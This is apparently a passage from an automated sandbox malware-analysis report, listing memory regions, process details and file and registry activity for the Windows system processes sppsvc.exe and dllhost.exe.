- |
| msv1_0.dll | 0x7ffc53d70000 | 0x7ffc53dcefff | Memory Mapped File | rwx |
|
|
|
- |
| ntlmshared.dll | 0x7ffc54200000 | 0x7ffc5420afff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7ffc54210000 | 0x7ffc54226fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptdll.dll | 0x7ffc54260000 | 0x7ffc54273fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ffc54280000 | 0x7ffc5428afff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x7ffc54320000 | 0x7ffc5434bfff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ffc543a0000 | 0x7ffc543c7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ffc543d0000 | 0x7ffc5443afff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7ffc54580000 | 0x7ffc54592fff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x7ffc545a0000 | 0x7ffc545e9fff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x7ffc545f0000 | 0x7ffc54600fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ffc54610000 | 0x7ffc5461efff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x7ffc54db0000 | 0x7ffc54f70fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x7ffc54f80000 | 0x7ffc55032fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffc55040000 | 0x7ffc5521cfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7ffc55280000 | 0x7ffc552b5fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ffc552c0000 | 0x7ffc5535cfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7ffc55380000 | 0x7ffc554dbfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ffc554e0000 | 0x7ffc5562dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffc55800000 | 0x7ffc558acfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7ffc55910000 | 0x7ffc559cdfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ffc56f10000 | 0x7ffc57094fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffc570a0000 | 0x7ffc571c5fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ffc571d0000 | 0x7ffc5744bfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ffc57540000 | 0x7ffc5759afff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7ffc57970000 | 0x7ffc57a14fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7ffc57aa0000 | 0x7ffc57b45fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
Process #92: sppsvc.exe
145
0
| Information | Value |
|---|---|
| ID | #92 |
| File Name | c:\windows\system32\sppsvc.exe |
| Command Line | C:\Windows\system32\sppsvc.exe |
| Initial Working Directory | C:\Windows |
| Monitor | Start Time: 00:02:03, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:59 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xef4 |
| Parent PID | 0x1e4 (c:\windows\system32\services.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\Network Service |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
B08
0x
F04
0x
F00
0x
EF8
0x
EFC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000a681120000 | 0xa681120000 | 0xa681126fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000a681130000 | 0xa681130000 | 0xa68113ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000a681140000 | 0xa681140000 | 0xa681153fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000a681160000 | 0xa681160000 | 0xa6811dffff | Private Memory | rw |
|
|
|
- |
| private_0x000000a6811e0000 | 0xa6811e0000 | 0xa68125ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000a681260000 | 0xa681260000 | 0xa68126ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000a681270000 | 0xa681270000 | 0xa681276fff | Private Memory | rw |
|
|
|
- |
| sppsvc.exe.mui | 0xa681280000 | 0xa681285fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000a681290000 | 0xa681290000 | 0xa68138ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0xa681390000 | 0xa68144dfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000a681450000 | 0xa681450000 | 0xa6815d7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000a6815e0000 | 0xa6815e0000 | 0xa681760fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000a681770000 | 0xa681770000 | 0xa68182ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000a681830000 | 0xa681830000 | 0xa681830fff | Private Memory | rw |
|
|
|
- |
| private_0x000000a681840000 | 0xa681840000 | 0xa681840fff | Private Memory | rw |
|
|
|
- |
| private_0x000000a681850000 | 0xa681850000 | 0xa68185ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000a681860000 | 0xa681860000 | 0xa68186ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000a681870000 | 0xa681870000 | 0xa6818effff | Private Memory | rw |
|
|
|
- |
| private_0x000000a6818f0000 | 0xa6818f0000 | 0xa6819effff | Private Memory | rw |
|
|
|
- |
| private_0x000000a6819f0000 | 0xa6819f0000 | 0xa681a6ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0xa681a70000 | 0xa681da6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000a681db0000 | 0xa681db0000 | 0xa681e2ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007df5ffec0000 | 0x7df5ffec0000 | 0x7ff5ffebffff | Pagefile Backed Memory | - |
|
|
|
- |
| pagefile_0x00007ff616f40000 | 0x7ff616f40000 | 0x7ff61703ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff617040000 | 0x7ff617040000 | 0x7ff617062fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff617065000 | 0x7ff617065000 | 0x7ff617066fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff617067000 | 0x7ff617067000 | 0x7ff617068fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff617069000 | 0x7ff617069000 | 0x7ff61706afff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff61706b000 | 0x7ff61706b000 | 0x7ff61706cfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff61706d000 | 0x7ff61706d000 | 0x7ff61706efff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff61706f000 | 0x7ff61706f000 | 0x7ff61706ffff | Private Memory | rw |
|
|
|
- |
| sppsvc.exe | 0x7ff617f40000 | 0x7ff61856dfff | Memory Mapped File | rwx |
|
|
|
- |
| clipc.dll | 0x7ffc3e830000 | 0x7ffc3e845fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptxml.dll | 0x7ffc3e850000 | 0x7ffc3e871fff | Memory Mapped File | rwx |
|
|
|
- |
| webservices.dll | 0x7ffc3ee30000 | 0x7ffc3efaafff | Memory Mapped File | rwx |
|
|
|
- |
| xmllite.dll | 0x7ffc4fb00000 | 0x7ffc4fb35fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7ffc53a90000 | 0x7ffc53ac2fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7ffc54210000 | 0x7ffc54226fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ffc54280000 | 0x7ffc5428afff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ffc543a0000 | 0x7ffc543c7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ffc543d0000 | 0x7ffc5443afff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x7ffc545f0000 | 0x7ffc54600fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ffc54610000 | 0x7ffc5461efff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x7ffc54db0000 | 0x7ffc54f70fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffc55040000 | 0x7ffc5521cfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ffc552c0000 | 0x7ffc5535cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ffc554e0000 | 0x7ffc5562dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffc55800000 | 0x7ffc558acfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7ffc55910000 | 0x7ffc559cdfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ffc56f10000 | 0x7ffc57094fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffc570a0000 | 0x7ffc571c5fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ffc571d0000 | 0x7ffc5744bfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ffc57540000 | 0x7ffc5759afff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x7ffc57750000 | 0x7ffc57890fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7ffc57aa0000 | 0x7ffc57b45fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
Host Behavior
File (11)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\System32\spp\store\2.0\data.dat | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_WRITE_THROUGH, share_mode = FILE_SHARE_READ |
|
2 | |
| Get Info | C:\Windows\System32\spp\store\2.0\data.dat.bak | type = file_attributes |
|
3 | |
| Get Info | C:\Windows\System32\spp\store\2.0\data.dat.tmp | type = file_attributes |
|
3 | |
| Get Info | C:\Windows\System32\spp\store\2.0\data.dat | type = size, size_out = 0 |
|
2 | |
| Read | C:\Windows\System32\spp\store\2.0\data.dat | size = 31328 |
|
1 |
Registry (134)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-1 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-10 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-11 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-12 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-13 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-14 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-15 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-16 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-17 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-18 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-19 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-2 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-20 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-21 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-22 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-23 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-24 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-25 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-26 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-27 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-28 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-29 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-3 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-30 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-31 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-32 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-33 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-34 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-35 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-36 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-37 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-38 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-39 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-4 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-40 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-41 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-42 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-43 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-44 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-5 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-6 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-7 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-8 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-9 | - |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-1 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-10 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-11 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-12 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-13 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-14 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-15 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-16 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-17 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-18 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-19 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-2 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-20 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-21 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-22 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-23 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-24 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-25 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-26 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-27 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-28 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-29 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-3 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-30 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-31 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-32 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-33 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-34 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-35 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-36 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-37 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-38 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-39 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-4 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-40 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-41 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-42 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-43 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-44 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-5 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-6 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-7 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-8 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-9 | type = REG_BINARY |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 |
Process #93: dllhost.exe
0
0
| Information | Value |
|---|---|
| ID | #93 |
| File Name | c:\windows\system32\dllhost.exe |
| Command Line | C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:03, Reason: Child Process |
| Unmonitor | End Time: 00:02:12, Reason: Self Terminated |
| Monitor Duration | 00:00:09 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xc7c |
| Parent PID | 0x23c (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
F5C
0x
F9C
0x
B04
0x
B00
0x
9F0
0x
A00
0x
F30
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x0000005caae00000 | 0x5caae00000 | 0x5caae0ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000005caae10000 | 0x5caae10000 | 0x5caae16fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000005caae20000 | 0x5caae20000 | 0x5caae33fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000005caae40000 | 0x5caae40000 | 0x5caaf3ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000005caaf40000 | 0x5caaf40000 | 0x5caaf43fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000005caaf50000 | 0x5caaf50000 | 0x5caaf51fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000005caaf60000 | 0x5caaf60000 | 0x5caaf60fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000005caaf70000 | 0x5caaf70000 | 0x5caaf76fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000005caaf80000 | 0x5caaf80000 | 0x5caaf80fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000005caaf90000 | 0x5caaf90000 | 0x5caaf90fff | Private Memory | rw |
|
|
|
- |
| private_0x0000005caafa0000 | 0x5caafa0000 | 0x5caafa0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000005caafb0000 | 0x5caafb0000 | 0x5caafb2fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000005caafd0000 | 0x5caafd0000 | 0x5caafd1fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000005caafe0000 | 0x5caafe0000 | 0x5cab0dffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x5cab0e0000 | 0x5cab19dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000005cab1a0000 | 0x5cab1a0000 | 0x5cab29ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005cab2a0000 | 0x5cab2a0000 | 0x5cab39ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005cab470000 | 0x5cab470000 | 0x5cab47ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x5cab480000 | 0x5cab7b6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000005cab7c0000 | 0x5cab7c0000 | 0x5cab8bffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005cab8c0000 | 0x5cab8c0000 | 0x5cab9bffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005cab9c0000 | 0x5cab9c0000 | 0x5cababffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000005cabac0000 | 0x5cabac0000 | 0x5cabc47fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000005cabc50000 | 0x5cabc50000 | 0x5cabdd0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000005cabde0000 | 0x5cabde0000 | 0x5cad1dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000005cad1e0000 | 0x5cad1e0000 | 0x5cad2dffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005cad3b0000 | 0x5cad3b0000 | 0x5cad3bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007df5ff340000 | 0x7df5ff340000 | 0x7ff5ff33ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff756b0c000 | 0x7ff756b0c000 | 0x7ff756b0dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff756b0e000 | 0x7ff756b0e000 | 0x7ff756b0ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff756b10000 | 0x7ff756b10000 | 0x7ff756c0ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff756c10000 | 0x7ff756c10000 | 0x7ff756c32fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff756c34000 | 0x7ff756c34000 | 0x7ff756c35fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff756c36000 | 0x7ff756c36000 | 0x7ff756c37fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff756c38000 | 0x7ff756c38000 | 0x7ff756c39fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff756c3a000 | 0x7ff756c3a000 | 0x7ff756c3bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff756c3c000 | 0x7ff756c3c000 | 0x7ff756c3cfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff756c3e000 | 0x7ff756c3e000 | 0x7ff756c3ffff | Private Memory | rw |
|
|
|
- |
| dllhost.exe | 0x7ff757890000 | 0x7ff757896fff | Memory Mapped File | rwx |
|
|
|
- |
| thumbcache.dll | 0x7ffc47230000 | 0x7ffc4727afff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x7ffc4cbd0000 | 0x7ffc4ce43fff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x7ffc511b0000 | 0x7ffc51332fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x7ffc52d70000 | 0x7ffc52e05fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7ffc53a90000 | 0x7ffc53ac2fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7ffc54210000 | 0x7ffc54226fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ffc54280000 | 0x7ffc5428afff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ffc543a0000 | 0x7ffc543c7fff | Memory Mapped File | rwx |
|
|
|
- |
